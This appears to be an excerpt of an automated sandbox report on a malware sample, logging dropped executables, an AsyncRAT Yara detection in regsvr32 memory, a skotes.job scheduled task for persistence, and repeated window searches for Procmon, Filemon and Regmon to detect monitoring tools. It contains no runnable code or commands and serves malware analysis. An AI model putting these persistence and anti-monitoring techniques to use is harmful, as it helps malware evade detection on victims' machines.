Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	File created: C:\Users\user\AppData\Local\Temp\is-S1J4E.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	File created: C:\Users\user\AppData\Local\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062147001\db8c172567.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\gaqlxgdr\gaqlxgdr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	File created: C:\Users\user\AppData\Roaming\uxtheme_2.drv (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe	File created: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	File created: C:\Users\user\AppData\Local\is-TG5QS.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	File created: C:\Users\user\AppData\Local\Temp\is-9LOBR.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe	Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe	File created: C:\Users\user\AppData\Local\dllhost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	File created: C:\Users\user\AppData\Local\Temp\is-9LOBR.tmp\_isetup\_isdecmp.dll	Jump to dropped file

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 34.2.regsvr32.exe.64ca5e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.2310000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.211131e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.2310000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.211131e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.64ca5e.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000022.00000002.4520725848.0000000002110000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.4516843364.000000000062B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.4521061526.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\E89E40C6A4873FA566F4 018E06F57725563E4525700EDFFAFB1B062BF5D4B0E9FEE498507F0F8200FCDF

Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
